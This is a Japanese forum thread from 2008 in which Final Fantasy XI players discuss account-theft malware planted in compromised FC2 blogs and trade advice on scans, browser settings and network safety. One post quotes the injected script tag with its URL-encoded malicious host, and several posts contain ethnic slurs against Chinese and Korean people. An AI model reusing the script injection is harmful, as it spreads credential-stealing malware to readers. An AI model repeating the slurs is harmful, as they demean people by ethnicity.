821 ：既にその名前は使われています：2008/03/23(日) 04:43:54.72 ID:k6O3D8qp: 別スレ見て来ました
現在IE＋つぼでFc2やら2chを見ていて、自分自身Fc2ブログを書いてるのですが今回の対策としては

オペラを入れて、これからはオペラでネットを閲覧するようにすれば多少は防衛になるのでしょうか？
後、fc2に罠が仕掛けられていた場合怖いので、チェックする方法を教えてほしいのですが・・・
822 ：既にその名前は使われています：2008/03/23(日) 04:45:29.75 ID:yTE0O1n2: >>821
カスペルスキーオンラインスキャン
ttp://www.kaspersky.co.jp/virusscanner
823 ：既にその名前は使われています：2008/03/23(日) 04:46:03.79 ID:wMXhzoTf: >820
＞怖いからPCではインターネットするのを止めた
結局ダメじゃね？ｗ
824 ：既にその名前は使われています：2008/03/23(日) 04:48:23.92 ID:xXOcBYrs: まじクソ業者しねばいいのに
もう業者じゃなくてただの犯罪者だよなぁっさっさとしねや
825 ：既にその名前は使われています：2008/03/23(日) 04:51:19.78 ID:qYTIKKd0: >>822
>>821は自分のブログのテンプレに罠が仕掛けられて無いか確かめる手段を探してるんじゃないか？
826 ：既にその名前は使われています：2008/03/23(日) 04:57:12.16 ID:yTE0O1n2: ソースみて
<script src="hxxp//%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74/%77%2E%6A%73"></script>
なのがあると駄目みたい？

カスペのスキャン終わらねｗ
827 ：既にその名前は使われています：2008/03/23(日) 05:09:28.94 ID:Sa/L7U8w: >>826
あからさまに中華サイトだね。
中国とか取り締まりも適当そうだし、
日本相手の悪事なら愛国無罪ってことで容認してそう。
828 ：既にその名前は使われています：2008/03/23(日) 05:18:34.48 ID:g7ReYxt9: ウィルスバスターとかに「個人情報の保護」ってのがあって
外に出したくない情報をブロックできるらしいんだが、POLパスとかコレに登録しても無駄？
829 ：既にその名前は使われています：2008/03/23(日) 05:20:59.47 ID:yTE0O1n2: >>828
無駄とのこと。
どっかにのってたが忘れた

上の方にも少しあるな
830 ：既にその名前は使われています：2008/03/23(日) 06:49:14.22 ID:0L5LrBc7: Xbox３６０はいいよぉ
好きな音楽聴きながらFFできるし
ビシージ中にフリーズだけは勘弁だが
831 ：既にその名前は使われています：2008/03/23(日) 07:27:13.68 ID:gqfp4hIG: 朝から糞スレ乱立してるねぇ…すぐに落ちそうなので支援あげ。
832 ：既にその名前は使われています：2008/03/23(日) 07:32:37.55 ID:IvMv0FMy: カスペルスキャン＆POLパス変更age。
833 ：既にその名前は使われています：2008/03/23(日) 07:39:29.81 ID:67blZkYV: >>830
PS2も360も安全じゃない。
834 ：既にその名前は使われています：2008/03/23(日) 08:44:25.36 ID:qNA8h4QZ: PGいれたらバンバン中華、韓国、台湾のIPがブロックされている履歴がでるんだが
これはかなりまずいんだろうか
835 ：既にその名前は使われています：2008/03/23(日) 08:54:27.69 ID:KS/szTZf: 業者じゃなかろうがあんなキチガイ民族のIPなんぞ蹴っちまえ
836 ：既にその名前は使われています：2008/03/23(日) 09:22:43.05 ID:5xv78arS: >>834
MSやWikipediaなんかは台湾や韓国に鯖置いてる。
なのでブロックした内容が全て危険とは限らない。
もちろん安全とも限らないがな。
837 ：既にその名前は使われています：2008/03/23(日) 09:22:56.19 ID:MFlpIDYY: カスペのオンラインスキャンがそろそろ終わりそうage
838 ：既にその名前は使われています：2008/03/23(日) 09:29:52.73 ID:IIluebVc: PG入れたんだが、ちょこちょこ履歴が更新されてて
IP見ただけじゃどこに送信してるのかわからんから怖いなｗｗ
PCの知識無いと全然ダメだな(´Д⊂
839 ：既にその名前は使われています：2008/03/23(日) 10:22:16.00 ID:ZQJPSeZu: >>833
PS2やダメ箱でIntelなWinAPIが叩けるわけもなく。
もし、それぞれで動作したというウィルスなりワームがあったというなら
ソースよろ
840 ：既にその名前は使われています：2008/03/23(日) 10:26:19.69 ID:5xv78arS: >>839
このスレの上の方にルーター共有がまずいとある。
パソコンが箱○を周辺機器として認識してしまうからね。
841 ：既にその名前は使われています：2008/03/23(日) 10:32:05.97 ID:gPE92pFK: >>840
箱がSMB喋って、PCが勝手に箱のフォルダ覗いてパス抜くってことか？
ありえねー
842 ：既にその名前は使われています：2008/03/23(日) 10:40:29.37 ID:5xv78arS: >>841
俺に突っ込まれても、俺は詳しくないのでコピペで。
----------------
730 名前：既にその名前は使われています投稿日： 2008/03/06(木) 21:21:21.02 ID:ztEZEpQX
PS2やXBOX360だからと言って安心できないようだ。

Spyware.AcePasswdSnif は、ローカルエリアネットワークを介したユーザーパスワードを監視し
キャプチャする、スパイウェアプログラムです。
http://ime.nu/www.symantec.com/ja/jp/business/security_response/writeup.jsp?docid=2008-030312-0133-99

簡単に言うと、同じルータに繋がってるPCがこれに感染するとパス抜かれる可能性がある。
843 ：既にその名前は使われています：2008/03/23(日) 11:24:48.14 ID:ZvWhdQmX: VistaでNOD32とavast使ってるんだが不安になってきた。
NOD32使って感染した人いる？
844 ：既にその名前は使われています：2008/03/23(日) 11:32:04.18 ID:sTHew//E: >>826のソースがあるとまずいらしいけど
ソースチェッカーでみてもそんなURLないっていわれるんだよなｗ

暗号化みたいのされてるのかな
%77%77%77が３つ続いてる部分が「www」っておもったんだけどどうなんだろ
845 ：既にその名前は使われています：2008/03/23(日) 11:54:05.38 ID:xNN0W4a0: >>844
そうだよ。
URI decoderでググって出たところにその文字列貼ってみ。
846 ：既にその名前は使われています：2008/03/23(日) 11:59:10.24 ID:Vrs+PchG: >>844
正解、URLエンコードってやつ。
ちなみにデコードすると・・・。

www■hellh■net/w■js

になる。（ピリオドは■に変えた）
847 ：既にその名前は使われています：2008/03/23(日) 12:12:05.05 ID:sTHew//E: >>845-856
おーあたってたかｗさんくす

動き的にはスクリプトだからこの暗号化されたURLがローカル落ちてきて
ローカルでデコードされてこの危険なURLみにいっちゃうってわけか
848 ：既にその名前は使われています：2008/03/23(日) 12:31:17.54 ID:xNN0W4a0: FC2改竄ブログ
ヴァナモンblog 1回改竄、ウイルスまきちらし中
ある黒魔道士の軌跡 1回改竄、ウイルスまきちらし中
ペコろぐ 1回改竄、修正済み
某青魔道士 2回改竄、閉鎖
戦士スキー 2回改竄、修正済み
ぺってん 1回改竄、修正済み
黒猫奮闘記 1回改竄、修正済み
849 ：既にその名前は使われています：2008/03/23(日) 12:35:41.58 ID:4uSd7bE+: ヴァナモンとある黒、ソースチェッカーで見てソース内を検索しても、
怪しいところが分からないんだけど……
%77で検索しても何もかからない。どこが×なのか教えてplz。
どちらも今のところFireFox＋Noscript、カスペ先生入りで今のところ反応なし。
850 ：既にその名前は使われています：2008/03/23(日) 12:37:15.98 ID:xNN0W4a0: >>847
ブラウザやサーバの標準的な機能。

ASCII(英数)は問題ないけど、他は基本的にまずいんで。
たとえば「あいうえお」でググるとこういう文字列がポストされる。
ttp://www.google.co.jp/search?hl=ja&q=%E3%81%82%E3%81%84%E3%81%86%E3%81%88%E3%81%8A
この右側ね。
URIにも当然使えるということで
ttp://%77%77%77%2e%67%6f%6f%67%6c%65%2e%63%6f%2e%6a%70/
(www.google.co.jp)
みたいに書ける。
851 ：既にその名前は使われています：2008/03/23(日) 12:43:42.48 ID:xNN0W4a0: >>849
Fx+NoScript+Kasperskyならかなり安全だ。
>>826 見てわからんのなら余計な冒険心は出さないほうがいい。

ソースチェッカーはキャッシュを持ち、改竄前のソースが出る
(かもしれん、よく知らん)のでその辺も念頭に。
852 ：既にその名前は使われています：2008/03/23(日) 12:44:08.16 ID:g/oa7LZ3: ■□■fc2ブログ改竄による垢ハックウイルス感染にご注意！■□■

昨年から猛威を振るっているパス抜きウイルスによるアカウントハックですが、先日より
新たな手口の罠が発覚し、多数の感染者が出ている模様です。その手口とは、主にFF11を扱っている
fc2ブログのテンプレート部分を何らかの手段で改竄し、ウイルスURLへ誘導するというものです。
これまでに改竄されたことが分かっているfc2ブログは以下のとおり

■改竄被害ブログ一覧
　　　黒猫奮闘記（1回改竄され修正済み）
　　　ぺってん（1回改竄され修正済み）
　　　戦士スキー（2回改竄され修正済み）
　　　某青魔道士（2回改竄され閉鎖）
　　　ペコろぐ（1回改竄され修正済み）
　　　ヴァナモンblog（改竄されてウィルスまきちらし中）　←要注意！
　　　ある黒魔道士の軌跡（改竄されてウィルスまきちらし中）　←要注意！

最近これらのブログやその他fc2のブログを閲覧したことのある方は、各種セキュリティソフトや
オンラインスキャンでウイルスチェックを行ってください。対策などは以下のスレにて
●●　RMT業者の垢ハックが多発している件13　●●　http://live27.2ch.net/test/read.cgi/ogame/1205225002/
FC2ブログを見に行くと垢ハックされるぞ　http://live27.2ch.net/test/read.cgi/ogame/1206155257/
853 ：既にその名前は使われています：2008/03/23(日) 12:47:05.23 ID:g/oa7LZ3: 20行だとこれくらいしか入らないな
一応作ってみたけど適当に改良してくれ
854 ：既にその名前は使われています：2008/03/23(日) 12:55:31.13 ID:3Q8DZLa7: FC2に何か穴があるんじゃないか？
アクセス数稼いでるFFブログは他にも多いだろうに、FC2だけ狙い撃ちだし。
855 ：既にその名前は使われています：2008/03/23(日) 12:57:58.68 ID:g/oa7LZ3: >>849
FFXI（仮）ってとこで今回の罠の解析をやってたから引用させてもらう

>おっと、ASPです(CGIみたいなもの)。
>処理は推測するしかありませんが、おそらく以下のようになっています。
>初回アクセスのHTTPヘッダ
>Location: error.htm
>次回アクセスのHTTPヘッダ
>Location: http://ime.nu/search■fc2■com

>解析を避けるためか、2回目以降はFC2に飛ばしてしまいます。

とのこと。正常に表示されるってことは、
もしかしたら既に一回hell■netにアクセスしたことがあるのかもしれない。
ちなみにそのFFXI（仮）もfc2ブログだから、自分で見るときは一応自己責任で
856 ：既にその名前は使われています：2008/03/23(日) 12:58:00.13 ID:5xv78arS: >>854
まあそうなんだけどfc2が調査しますといったきり
なしのつぶてなので何とも言えないのが現状。
ネ実の空気的にはfc2に脆弱性があり、
そこを現在進行形で攻められているといったかんじ。
857 ：既にその名前は使われています：2008/03/23(日) 13:00:38.50 ID:xNN0W4a0: >>855
晒すなよ；；
858 ：既にその名前は使われています：2008/03/23(日) 13:05:10.80 ID:g/oa7LZ3: >>857
おやご本尊が居たかｗ
hellhでぐぐったらトップだよｗ
859 ：既にその名前は使われています：2008/03/23(日) 13:09:55.56 ID:xNN0W4a0: >>858
そんな簡単にクラックされるもんか? と思って
作ってみたが、罠コメ1つ来やしねぇｗ
860 ：既にその名前は使われています：2008/03/23(日) 13:16:25.12 ID:g/oa7LZ3: >>859
ブログにID出したなｗ
あれだけセキュリティっぽいことばっかり書いてると流石に狙われないと思うぞｗ
861 ：既にその名前は使われています：2008/03/23(日) 13:30:52.44 ID:xNN0W4a0: 作って思ったけど、FC2が圧倒的なシェアを持つ要因は
自由度の高さの他にテンプレの豊富さにあると思った。
ただこのテンプレ、公式(自分の使ってるあのキモいのも公式)以外に
共通テンプレートというユーザが作った物も大量にある。
そっちに仕掛けて登録したんじゃないかなぁ。
862 ：既にその名前は使われています：2008/03/23(日) 13:40:04.15 ID:xNN0W4a0: 1個追加する羽目になった。

■改竄被害ブログ一覧
　　　黒猫奮闘記 (1回改竄され修正済み)
　　　ぺってん (1回改竄され修正済み)
　　　戦士スキー (2回改竄され修正済み)
　　　某青魔道士 (2回改竄され閉鎖)
　　　ペコろぐ (1回改竄され修正済み)
　　　ヴァナモンblog (改竄されてウィルスまきちらし中) ←要注意!
　　　ある黒魔道士の軌跡 (改竄されてウィルスまきちらし中） ←要注意!
　　　FF11初心者の館 (改竄されてウィルスまきちらし中） ←要注意!
863 ：既にその名前は使われています：2008/03/23(日) 14:29:58.48 ID:xNN0W4a0: 下2つの罠は新ドメイン。
fccja■com
IPがhellhの1つ違いなので同一犯だろう。
検体は入手、提出済み。
864 ：既にその名前は使われています：2008/03/23(日) 14:52:54.96 ID:+GAVa0zj: age
865 ：既にその名前は使われています：2008/03/23(日) 15:28:34.38 ID:SkNOzZnD: ag
866 ：既にその名前は使われています：2008/03/23(日) 15:32:47.34 ID:qVzDo+fV: びすたｗでカスペルオンラインスキャン動かないよage
PG2も動かないよage
びすたｗ氏ねよage
867 ：既にその名前は使われています：2008/03/23(日) 15:44:44.72 ID:67blZkYV: いらない子OSで有名なビスタなんか入れるのは自業自得。
868 ：既にその名前は使われています：2008/03/23(日) 15:53:39.73 ID:IqbHZafj: Me：…ひさしぶりにわたしのでばんですｓｓｓｓｓｓ
869 ：既にその名前は使われています：2008/03/23(日) 16:37:33.93 ID:IFeQsj78: 日曜だからかどんどんさがるなぁ。
870 ：既にその名前は使われています：2008/03/23(日) 16:45:38.70 ID:hP7NGMjJ: PS2も360も安全じゃない。とかいういい加減な馬鹿は、ソースだせｗ
煽るのもいい加減にしろよ？

もしも、PS2、箱で抜かれた奴いたら報告してくれｗ
全く、知識もないくせに煽りは一流だな。
871 ：既にその名前は使われています：2008/03/23(日) 16:47:45.78 ID:g/oa7LZ3: >>868
お前のおかげでCTRL+ALT+SHIFT+DELを押すことに躊躇いを感じなくなったよ
が、お前もカスペのオンラインスキャン未対応だから黙ってろｗ
872 ：既にその名前は使われています：2008/03/23(日) 17:06:47.22 ID:xNN0W4a0: Shiftいらないだろｗ
873 ：既にその名前は使われています：2008/03/23(日) 17:10:16.68 ID:5xv78arS: >>870
>>842のシマンテックレポートってどうなの。
その辺解説頼む。
874 ：既にその名前は使われています：2008/03/23(日) 17:31:00.62 ID:uO8R4ZzD: >>873
古いハブ（リピータハブ）を使ってなければ大丈夫

普通に売ってるハブはスイッチんぐハブといって
他の機材宛のパケットは送られてこないハブだからキャプチャできない

例外は
ICS（インターネット接続の共有）ってWindowsの機能を有効にしていると
PCがルーターとして働くので
WAN宛てのパケットがPCに送られてくるんでキャプチャ可能になる
875 ：既にその名前は使われています：2008/03/23(日) 17:31:59.84 ID:6PJIpzDK: 箱とかでキーボード使って、パスとか入力したら>>842の
奴で抜かれる可能性あるんじゃね？
876 ：既にその名前は使われています：2008/03/23(日) 17:50:41.66 ID:qnf1RAqF: >>875
せっかく>>874が解説してくれてるのに理解してないのか。
ＦＦにたとえるとだな、
昔のハブ（ダムハブ）を使っていると、/sayで喋ってるのと同じで
近くにいる香具師全員に聞こえていた。普通はオレ関係ねーなと
無視するが、>>842みたいのが聞き耳たててるとパス抜かれる。

最近のハブ（スイッチングハブ）は/tellで喋るのと同じで
近くにいようと関係ない香具師には聞こえなくなってる。
ただしインターネット接続の共有を使ってると、スパイ本人に
/tellでパス教えることになるのでヤバい。
877 ：既にその名前は使われています：2008/03/23(日) 17:59:11.64 ID:d6uoand2: >>876
要するにダムハブはこうなの？
●＜俺のIDとPASS○○○
■＜把握した
▲＜関係無いんだが聞こえる
878 ：既にその名前は使われています：2008/03/23(日) 17:59:18.60 ID:5xv78arS: AcePasswdSnifに感染しても
古いハブを使っておらず、インターネット接続の共有をしていなければ
大丈夫ということか。
PS2や360でパス抜きされるのは本当に特殊な状況でのみなのね。
879 ：既にその名前は使われています：2008/03/23(日) 18:00:06.03 ID:fIC9E8u/: ageてくれ
880 ：既にその名前は使われています：2008/03/23(日) 18:01:49.53 ID:6PJIpzDK: >>876
単なるリロードし忘れ今見て気づいた（´・ω・｀）
881 ：既にその名前は使われています：2008/03/23(日) 18:08:08.66 ID:6GrFKvea: ■は放置かねー
被害にあった人に、最低限の保障でもしてくれれば見方が変わるのに
今はユーザーが自分でアイテムを渡したってことにされてるんだよな・・・

設定で、アイテム類を絶対に捨てられないようにとか出来ないかね
882 ：既にその名前は使われています：2008/03/23(日) 18:10:00.60 ID:+ABptBt9: 全くﾁｮﾝはﾛｸな事しねぇな
883 ：既にその名前は使われています：2008/03/23(日) 18:14:29.02 ID:cPH94Qia: >>753
こういうスレでそういうショボい煽りするくらいならIE6でセキュリテイ高設定で
感染する感染経路について語った上で、

ただ高に設定するだけでお前が満足ならそうすれば

とでも言えよ。
くだらない駄レスしてんなよな。
884 ：既にその名前は使われています：2008/03/23(日) 18:17:25.38 ID:ZLisMUnl: えっと、ＰＳ２とパソの２台でＦＦやってて、
ＰＳ２はパス記憶、パソはパス手打ちにしてるんだけど、これで問題ないでしょうか？
885 ：既にその名前は使われています：2008/03/23(日) 18:23:24.31 ID:6PJIpzDK: >>883
まあこれも十分駄レスだよな
886 ：既にその名前は使われています：2008/03/23(日) 18:26:23.03 ID:BF1y+lk+: >>878
感染もなにも、「Ace Password Sniffer」はオンライン販売されているソフト
フリーのパケットキャプチャソフトにパスワード抜き出しツールを被せたもの
シマンテックはこれを「好ましからざるソフト」に分類した
カスペルスキーがWinnyやShareを「好ましからざるソフト」扱いするのと同じ

みんなが説明してくれているように、リピータハブを使っていてかつ業者と
同居していなければPS2やXBOXがやり取りするデータがPCに流れることはないよ
たとえ流れても、専用の解読ツールでも作らない限りパスは抜けない
887 ：既にその名前は使われています：2008/03/23(日) 18:32:58.65 ID:d6uoand2: つまみ弄ってるだけで感染しないならカスペとか要りませんよね
888 ：既にその名前は使われています：2008/03/23(日) 18:36:52.68 ID:g+xzTRP1: >>884
手打ちでも抜かれる時は抜かれる
もう一度>>4-6と>>14-15をよく読んで
889 ：既にその名前は使われています：2008/03/23(日) 18:44:04.70 ID:pHJE1UMO: >>866
おれもvista使いだがカスペル君ふつーに快適だぜ？
オンラインスキャンじゃなくて、体験版落してインスコするよろし。
　
そのあと全スキャンだ。（初回はちょー時間かかるｗ）
　
　
まだ出てきてないけど仕組まれてるブログ多そうだよな・・・
890 ：既にその名前は使われています：2008/03/23(日) 18:44:44.37 ID:g+xzTRP1: ちょっと言葉足りなかった
>>15でブログ持って無くても他人のを見るなら、iframe無効にした方が良いね
891 ：既にその名前は使われています：2008/03/23(日) 18:45:24.88 ID:sX7m8coI: >>861
それはないな
改竄されたブログのなかで以前から見ていたところもいくつかあるが
テンプレを新しくした途端になったという類のものじゃねー
仕掛けて登録したとかいうほどちゃちなもんじゃねーよ
892 ：既にその名前は使われています：2008/03/23(日) 18:48:33.79 ID:cPH94Qia: >>891
FC2のルート権限に近いとこが乗っ取られてFFXIでヒット数多いブログから
iframe埋め込まれていったって感じかね？
893 ：既にその名前は使われています：2008/03/23(日) 18:49:56.33 ID:3CXZSf/k: >>861
テンプレ登録は誰でも自由にできるものじゃなくて
申請してから数日かけてFC2側がチェックして
問題ないと承認されて初めてうｐされる仕組み。
さすがに罠テンプレは登録できねえ。プラグイン登録も同様ね。
894 ：既にその名前は使われています：2008/03/23(日) 18:52:11.63 ID:5xv78arS: まあFF以外でも今回の被害は酷いみたい。
http://ime.nu/www.watch.impress.co.jp/game/docs/20080321/on0321.htm
でニュースになってるくらいだから相当規模が大きかったんだろうね。
リネでもWoWでも「アカハック気をつけてね！」と
(気休めではあるが)注意を促しているというのに、FF11ときたら・・・
895 ：既にその名前は使われています：2008/03/23(日) 18:54:48.01 ID:9CfIjSPs: これ感染したブログ行ってもレジストリの変更常に監視しとけば防げるもの？
896 ：既にその名前は使われています：2008/03/23(日) 18:57:35.92 ID:ZLisMUnl: >888
ありがとう。>4-5はほとんどやってるんです…。
あとは超こまめにＰＳ２からパスを変えまくるくらいしかないのかな。
ＰＣ２台用意できればいいんだろうけどスペース的に無理＞＜
897 ：既にその名前は使われています：2008/03/23(日) 19:02:12.25 ID:xNN0W4a0: ■改竄被害ブログ一覧
　黒猫奮闘記 (1回改竄され修正済み)
　ぺってん (1回改竄され修正済み)
　戦士スキー (2回改竄され修正済み)
　某青魔道士 (2回改竄され閉鎖)
　ペコろぐ (1回改竄され修正済み)
　ヴァナモンblog (1回改竄され修正済み)
　Lostfr【誰か】かまって【くれませんか？】 (1回改竄され修正済み)
　ある黒魔道士の軌跡 (改竄されてウィルスまきちらし中） ←要注意!
　FF11初心者の館 (改竄されてウィルスまきちらし中） ←要注意!

1個修正、1個追加。
898 ：既にその名前は使われています：2008/03/23(日) 19:11:47.00 ID:gxX/zfaz: >>881
犠牲者も相変わらず課金してるのが居るだろうし、
犠牲者ではなくとも対応しない事で課金しなくなる事がないなら
スクエニはともかく、株主は資金つぎ込む事に反対するだろう。
899 ：876：2008/03/23(日) 19:17:32.84 ID:qnf1RAqF: >>877
すまんメシ行ってた。それであってる。

あと、南米だかどこだかで広く使われてるルータそのものがハックされた
という事例があったと思う。その場合はインターネット接続共有してるＰＣが
やられたのと同じ状態にはなるな。
日本でルータを狙うとしたら、ヤフＢＢとかか？

>>878
PS2や360でプレイしていても、セキュ甘いＰＣでＬＳコミュ見てたら
危ないという可能性はある。あまり油断しない方がいい。
900 ：既にその名前は使われています：2008/03/23(日) 19:19:39.67 ID:uO8R4ZzD: ルーターのSMNP脆弱性を突いてXSS仕掛けるとかいう記事を最近読んだきがする
901 ：既にその名前は使われています：2008/03/23(日) 19:28:47.88 ID:NNgXQbyq: なるほど。ドリームキャストが最強ってことだな？
902 ：既にその名前は使われています：2008/03/23(日) 19:36:01.52 ID:nS7LdL6n: R7なら言うことないな
903 ：既にその名前は使われています：2008/03/23(日) 19:38:07.94 ID:/4hrJxrn: ドリームキャストの起動音は坂本龍一

坂本＜地味だとか言われるんですけどあの画には合ってると思うんですよね
904 ：既にその名前は使われています：2008/03/23(日) 19:51:12.67 ID:gxX/zfaz: 良く分からんがルータークラックして打ち込んだURLと違う所に飛ばす
ッて言う手法があるって記事読んだ事があるな。
ちなみにIP(192.168.1.1等)直打ちだとちゃんと目的の所に飛ばされるが
h t t p ://www■playonline■com/ff11/index■shtml
とかだと偽装した所に飛ばされるそうな。
905 ：既にその名前は使われています：2008/03/23(日) 19:51:25.31 ID:71EMJ3TS: 注意喚起！
緊急浮上！
906 ：既にその名前は使われています：2008/03/23(日) 20:00:15.43 ID:Y0PuukFM: ドーリームキャストの起動音どんなだっけ？
907 ：既にその名前は使われています：2008/03/23(日) 20:20:04.09 ID:lKr76C0u: >>906

わちちょん！
908 ：既にその名前は使われています：2008/03/23(日) 20:23:26.50 ID:Gy8CwQuV: 何と言うファストブレード・・・
909 ：既にその名前は使われています：2008/03/23(日) 20:41:21.13 ID:dUlWM6x6: この土日　
もっと被害報告が多発するかと思ったけど　
意外に少なかったなあ　

だいぶ浸透してきたのだろうか
910 ：既にその名前は使われています：2008/03/23(日) 20:44:47.69 ID:G7FSqg9o: ギルの価値がなくなれば業者も撤退する(アカハックしなくなる)から、ゲーム内の通報も頼むぜ
最近、春厨急増で通報スレ落ちたから保守もたのむ
911 ：既にその名前は使われています：2008/03/23(日) 21:38:11.23 ID:g/oa7LZ3: 物凄い勢いで落ちていくな保守
912 ：既にその名前は使われています：2008/03/23(日) 22:50:13.92 ID:IFeQsj78: 保守クポー。
913 ：既にその名前は使われています：2008/03/23(日) 22:52:50.03 ID:DSymiHcE: >>910
罠を張りまくってる奴が生息している四川省などは、
手取り年収２万円とかだしな。
１日１００円あれば生活できる世界だ。業者手ごわしｗ
914 ：既にその名前は使われています：2008/03/23(日) 23:06:07.41 ID:PckGZDMW: >>894
□でも気休め程度ならいってるぞｗ＞注意
915 ：既にその名前は使われています：2008/03/23(日) 23:09:59.84 ID:Y0PuukFM: >>894
eq2はハック前まで戻してくれたんだな
ソニー系は一律か？

スクエニはどうした？
916 ：既にその名前は使われています：2008/03/23(日) 23:13:19.25 ID:PckGZDMW: >>915
エクレアは一回限り復活というのが最近の流れっぽい
過去ログでもある

ところで、公式に何が来たかまだ教えてくれないのかね
917 ：既にその名前は使われています：2008/03/23(日) 23:22:42.56 ID:Y0PuukFM: おれじゃねぇーｗ
918 ：既にその名前は使われています：2008/03/23(日) 23:25:54.77 ID:Y0PuukFM: ジャスミンオンライン板に凶悪な抜き物がUPられた
919 ：既にその名前は使われています：2008/03/23(日) 23:43:15.27 ID:/4hrJxrn: 業者はジャスミンを理解してるのだろうか・・・
920 ：既にその名前は使われています：2008/03/23(日) 23:58:26.46 ID:DzS5YI25: ｼﾅ駆逐支援あげ
921 ：既にその名前は使われています：2008/03/24(月) 00:02:15.07 ID:1XW8eX52: 今月も自慢げに凍結ギルの総額を発表するんだろうが垢ハックから得た金が凍結されてるのかと思うとやるせないな
922 ：既にその名前は使われています：2008/03/24(月) 00:04:14.04 ID:3J7BYvf2: バハ鯖で、今垢ハックがあった
923 ：既にその名前は使われています：2008/03/24(月) 00:07:58.27 ID:jzSS9EQW: ■からみたらハックにあった人は100万分の1人だろうけど
ハックにあった人はそれがすべてだからな～
早く対処してもらいたいもんだ
924 ：既にその名前は使われています：2008/03/24(月) 00:13:35.33 ID:7DTVIQ6X: FCブログの騒動は自衛でなんとかなるもんじゃないしなあ
週明けてもだんまり決め込むのかな
925 ：既にその名前は使われています：2008/03/24(月) 00:15:26.78 ID:rpE40Jdl: http://live27.2ch.net/test/read.cgi/ogame/1205774044/
バハ鯖↑
いまハックされた人が来たんですけど、今できることってやっぱサポセン開くまでですかね・・・
926 ：既にその名前は使われています：2008/03/24(月) 00:15:41.31 ID:ZfckpKA+: こちらへ誘導されてきました<(_ _)>バハムートのＬｉｒｉｓです。
アカウントを取られてしまったようなので色々教えて欲しくて来ました。
駆除する方法は、どうやったら良いでしょうか？よろしくお願いします<(_ _)>
927 ：既にその名前は使われています：2008/03/24(月) 00:16:03.32 ID:Ebm+e59Y: せめて公式で呼びかけろよなっておもうわｗ
企業がこの騒動を知らないわけじゃないし
ここ見てなくてブログ巡回してる人なんてゴロゴロいるわけだしな
928 ：既にその名前は使われています：2008/03/24(月) 00:18:01.53 ID:J6GiBSTn: >>926
テンプレの>>7-9を読む。
929 ：既にその名前は使われています：2008/03/24(月) 00:20:28.29 ID:J6GiBSTn: カスペルスキーオンラインスキャンでウイルスが見つかるかチェックする。
見つかった場合はウイルスの名前をこのスレッドに書いてくれると
後の被害者が減るかもしれない。
よくわからなかったらOS入れなおし。
930 ：既にその名前は使われています：2008/03/24(月) 00:20:34.64 ID:xDF5nHrk: >>926
インできるリアルフレがいれば
ヴァナからGMに連絡とって　キャラを止めてもらえる
とりあえずどんな形でもキャラ止めろ
朝まで放置しておくと
鯖移動されたりエクレアまで捨てられる可能性が大
931 ：既にその名前は使われています：2008/03/24(月) 00:22:04.13 ID:7DTVIQ6X: >>930
俺のフレはリアフレの垢からGMに直訴しても止めてもらえなかったそうだ
先週の件は異例なんじゃないのか？
どのみち糞使えない管理体制だ
932 ：既にその名前は使われています：2008/03/24(月) 00:26:04.56 ID:xDF5nHrk: >>931
マジかそれ・・・
サポセンは朝まで使えんならどうにもならんな・・・
相変わらずの糞管理だな･･･
933 ：既にその名前は使われています：2008/03/24(月) 00:26:34.51 ID:rpE40Jdl: 今どっちのキャラもいないっぽいです～。倉庫は一体だけですか？
934 ：既にその名前は使われています：2008/03/24(月) 00:29:45.83 ID:rpE40Jdl: >>926
今バハスレ変な荒らしが沸いてあぼ～んしないと読みにくい事になってるので、
私はこっちにサーチ状況かいてきますね。いまはスキャン中かな
935 ：既にその名前は使われています：2008/03/24(月) 00:36:20.58 ID:ZfckpKA+: >>928
わかりました、よく読んできます<(_ _)>

>>929
了解です、今さっそくやっている最中です。
後ほど報告します

>>930
鯖スレの方々にも色々とやっていただきました。
あとは明日、サポートセンターへ電話してみようと思います。

>>933
一人だけです。倉庫にはほとんど何も送ってませんので…

>>934
そうです、間もなく終わると思います。
936 ：既にその名前は使われています：2008/03/24(月) 00:51:16.34 ID:NqCGjbde: >>935
サポセンに電話する時に用意するもの
・POLからきた登録ハガキ
・POL　FFXIソフトについてたもの
本人確認で色々聞かれるので即答できるように準備を
日本語でおｋな人もココ見てるようなので詳しくは書けません
あとゲーム内のキャラのことでも確認される場合あり

月曜は電話つながりにくいので家の電話と携帯あれば2台駆使してかけまくってみて下さい
937 ：既にその名前は使われています：2008/03/24(月) 00:54:25.99 ID:7DTVIQ6X: サーチにかからないことで安心はまずいかも
鯖移動させられてる可能性がある
俺のフレはログアウト後別鯖に飛ばされてた
938 ：既にその名前は使われています：2008/03/24(月) 01:01:14.47 ID:V0clbcIb: anonにしてなかったらPOLのフレンドサーチで今どこにいるかは見れるな。
939 ：既にその名前は使われています：2008/03/24(月) 01:01:44.03 ID:rpE40Jdl: クレカだったら使われちゃうかもですね、、、
シャウトしたんですが、サンドじゃやはりフレの方は見つけられませんでした＞＜
でも、フレがアカハックにあったって方が協力申し出てくれました。現状はLirisさんのキャラ見つけたら
とかの情報のみになっちゃいますが・・・。
940 ：既にその名前は使われています：2008/03/24(月) 01:02:30.67 ID:vQXYTLxz: >>932
■がきちんとした方針を出してないから外れGMひくとアウトだと思われ。
941 ：既にその名前は使われています：2008/03/24(月) 01:05:34.13 ID:ZfckpKA+: >>939
ありがとうございます！クレカではなくウェブマネーですが今月で切れちゃうんですよね…orz
942 ：既にその名前は使われています：2008/03/24(月) 01:10:52.51 ID:rpE40Jdl: Lirisさん変なメールきてない？荒らしが酷いことになってるけど・・・。ああいうのって規制できないのかなぁ
あと、バハスレにアカ余分にもってるけど使う？って聞いてきてる方がいるので、返事をお願いします
パニック状態だろうけど・・・がんばってください。
私もバハなので、できる事ならお手伝いしますので・・・＞＜
943 ：既にその名前は使われています：2008/03/24(月) 01:12:21.05 ID:SUKEKrB0: 今荒らしてるやつどうせ口だけのやつだろうしほっとけばいいんじゃねーかｗ
944 ：既にその名前は使われています：2008/03/24(月) 01:12:21.68 ID:aCIWlJ1+: 日を追うごとに深刻になってるな・・・・・
スクエニはとりあえず対策云々の前にもっと注意の喚起しろよ・・・・・

とりあえず対策自分なりにまとめた
windowsupdateを欠かさない
ウィルスソフトを入れる、更新をサボらない（カスペがお勧め？）
PG２導入
PC用FF用にマシンを分ける（これはモデム→ルーター→ハブ→PC、PS2とかにすんのか？だれかおしえてくれ）
real　playerアンインスコ
IEは避ける。firefoxとかを使ってiframeなどの禁止設定

いまんとここんぐらいか、PG2もいつまで効果期待できるかわからんだろうし・・・・・・
リネ２とかの公式の対応とかどんなんなんだろうか？
